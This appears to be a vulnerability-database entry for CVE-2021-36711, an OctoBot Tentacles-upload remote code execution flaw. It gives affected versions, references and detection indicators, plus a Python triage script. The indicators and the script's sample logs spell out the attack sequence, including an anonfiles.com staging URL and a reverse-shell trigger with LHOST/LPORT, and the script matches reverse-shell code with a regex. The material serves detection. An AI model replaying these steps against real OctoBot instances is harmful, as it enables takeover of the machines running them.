CVE-2021-36711
CVE-2021-36711: WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
Published: 2022-07-16
Priority: P2 · 73
Severity: critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 12.08% (95.6th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| octobot | octobot | < 0.4.4 | 0.4.4 |
| octobot | octobot | >= 0 < 0.4.4 | 0.4.4 |
Detection & IOCs (extracted from the linked sources)
URL (official OctoBot Tentacles package location referenced in the sources): https://static.octobot.online/tentacles/officials/packages/full/base/{octobotVersion}/any_platform.zip
- Detect POST requests to /advanced/tentacle_packages?update_type=add_package carrying Content-Type: application/json and X-Requested-With: XMLHttpRequest, whose JSON body maps a remote ZIP URL to the value 'register_and_install'.
- Alert on HTTP requests to /api/sashimi with LHOST and LPORT query parameters; this is the endpoint the injected backdoor exposes to trigger its reverse shell.
- Monitor for outbound connections from the OctoBot process to anonfiles.com, which the public exploit uses to stage the malicious ZIP payload.
- Flag GET requests to /commands/restart shortly after a Tentacle package upload: the exploit restarts OctoBot to activate the injected backdoor.
- Inspect ZIP packages uploaded to OctoBot for a modified reference_tentacles/Services/Interfaces/web_interface/api/metadata.py containing socket/pty reverse-shell code.
- Caveat: the public exploit only works against OctoBot instances with no password protection; a 302 or other non-200 response to the root URL indicates the instance is password-protected, and the exploit aborts.
- Scope: affected versions are OctoBot 0.4.0beta3 through 0.4.3; 0.4.4 and later are patched.
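As an added example, not code from this page or from the OctoBot project, the detection ideas above are turned into a small Python triage script. It runs over constructed, simplified HTTP log records (a list of dicts, not any real OctoBot or proxy log format) and over an in-memory ZIP, so the record layout, the field names, the 60-second restart window and the `build_sample_zip` helper are assumptions; the paths, headers, query parameters and the metadata.py file path are the ones quoted above.

```python
"""Triage for the CVE-2021-36711 indicators: request-sequence rules plus ZIP inspection."""
import io
import json
import re
import zipfile
from urllib.parse import parse_qs, urlparse

# Constructed sample records (assumed layout): one upload/restart/trigger sequence plus noise.
SAMPLE_LOG = [
    {"ts": 100, "method": "GET", "path": "/", "status": 200, "headers": {}, "body": ""},
    {"ts": 101, "method": "POST", "path": "/advanced/tentacle_packages?update_type=add_package",
     "status": 200,
     "headers": {"Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest"},
     "body": json.dumps({"https://anonfiles.com/abcd/evil_tentacle.zip": "register_and_install"})},
    {"ts": 103, "method": "GET", "path": "/commands/restart", "status": 200, "headers": {}, "body": ""},
    {"ts": 140, "method": "GET", "path": "/api/sashimi?LHOST=203.0.113.5&LPORT=4444",
     "status": 200, "headers": {}, "body": ""},
    # A restart long after the upload: outside the window, so it is not flagged.
    {"ts": 200, "method": "GET", "path": "/commands/restart", "status": 200, "headers": {}, "body": ""},
]

SUSPECT_HOSTS = {"anonfiles.com"}                    # staging host named in the sources
OFFICIAL_PREFIX = "https://static.octobot.online/tentacles/officials/"
RESTART_WINDOW_S = 60                                # assumed correlation window
BACKDOOR_PATH = "reference_tentacles/Services/Interfaces/web_interface/api/metadata.py"
SHELL_PATTERN = re.compile(r"\b(import\s+(socket|pty)|socket\.socket\(|pty\.spawn\()")


def remote_zip_urls(body):
    """Return remote ZIP URLs mapped to 'register_and_install' in a tentacle_packages body."""
    try:
        data = json.loads(body)
    except (ValueError, TypeError):
        return []
    if not isinstance(data, dict):
        return []
    return [k for k, v in data.items()
            if v == "register_and_install" and isinstance(k, str)
            and k.lower().endswith(".zip") and urlparse(k).scheme in ("http", "https")]


def scan_http_log(records):
    """Return (rule_name, ts, detail) tuples for every rule hit, in time order."""
    hits = []
    last_upload_ts = None
    for r in sorted(records, key=lambda x: x["ts"]):
        u = urlparse(r["path"])
        q = parse_qs(u.query)
        hdr = {k.lower(): v for k, v in r["headers"].items()}
        if (r["method"] == "POST" and u.path == "/advanced/tentacle_packages"
                and q.get("update_type") == ["add_package"]
                and hdr.get("content-type", "").startswith("application/json")
                and hdr.get("x-requested-with") == "XMLHttpRequest"):
            for url in remote_zip_urls(r["body"]):
                last_upload_ts = r["ts"]
                host = urlparse(url).hostname or ""
                # Anything not served from the official package location is worth a look.
                sev = "high" if host in SUSPECT_HOSTS or not url.startswith(OFFICIAL_PREFIX) else "info"
                hits.append(("remote_tentacle_install", r["ts"], f"{sev}: {url}"))
        elif u.path == "/api/sashimi" and "LHOST" in q and "LPORT" in q:
            hits.append(("sashimi_reverse_shell_trigger", r["ts"], f"{q['LHOST'][0]}:{q['LPORT'][0]}"))
        elif (u.path == "/commands/restart" and last_upload_ts is not None
              and r["ts"] - last_upload_ts <= RESTART_WINDOW_S):
            hits.append(("restart_after_package_upload", r["ts"], f"{r['ts'] - last_upload_ts}s after upload"))
    return hits


def inspect_tentacle_zip(zip_bytes):
    """Return reasons the package looks backdoored (empty list means nothing found)."""
    reasons = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.endswith(BACKDOOR_PATH):
                src = zf.read(name).decode("utf-8", "replace")
                found = sorted({m[0] for m in SHELL_PATTERN.findall(src)})
                if found:
                    reasons.append(f"{name}: reverse-shell primitives {found}")
    return reasons


def build_sample_zip(metadata_src):
    """Constructed helper: an in-memory tentacle ZIP holding one metadata.py."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(BACKDOOR_PATH, metadata_src)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_http_log(SAMPLE_LOG):
        print(hit)
    print(inspect_tentacle_zip(build_sample_zip("import socket\nimport pty\n")))
```

The restart rule is deliberately stateful: a lone `/commands/restart` is normal operator behaviour, and only one that follows a remote package install inside the window is raised. The ZIP check only matches the file path named in the sources; a package that plants the shell elsewhere needs a broader scan.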
Sources
OSV · 2022-07-17 · Octobot mishandles Tentacles upload [CRITICAL]
WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
GHSA · 2022-07-17 · Octobot mishandles Tentacles upload [CRITICAL] · CWE-434
WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
OSV · 2022-07-16 · CVE-2021-36711: WebInterface in OctoBot before 0
WebInterface in OctoBot before 0.4.4 allows remote code execution because Tentacles upload is mishandled.
No detection rules found.
No writeups or analysis indexed.
References
http://packetstormsecurity.com/files/167780/OctoBot-WebInterface-0.4.3-Remote-Code-Execution.html
https://github.com/Drakkar-Software/OctoBot/blob/master/CHANGELOG.md
https://github.com/Drakkar-Software/OctoBot/issues/1966
https://github.com/Nwqda/Sashimi-Evil-OctoBot-Tentacle
https://packetstormsecurity.com/files/167721/Sashimi-Evil-OctoBot-Tentacle.html
https://www.octobot.online/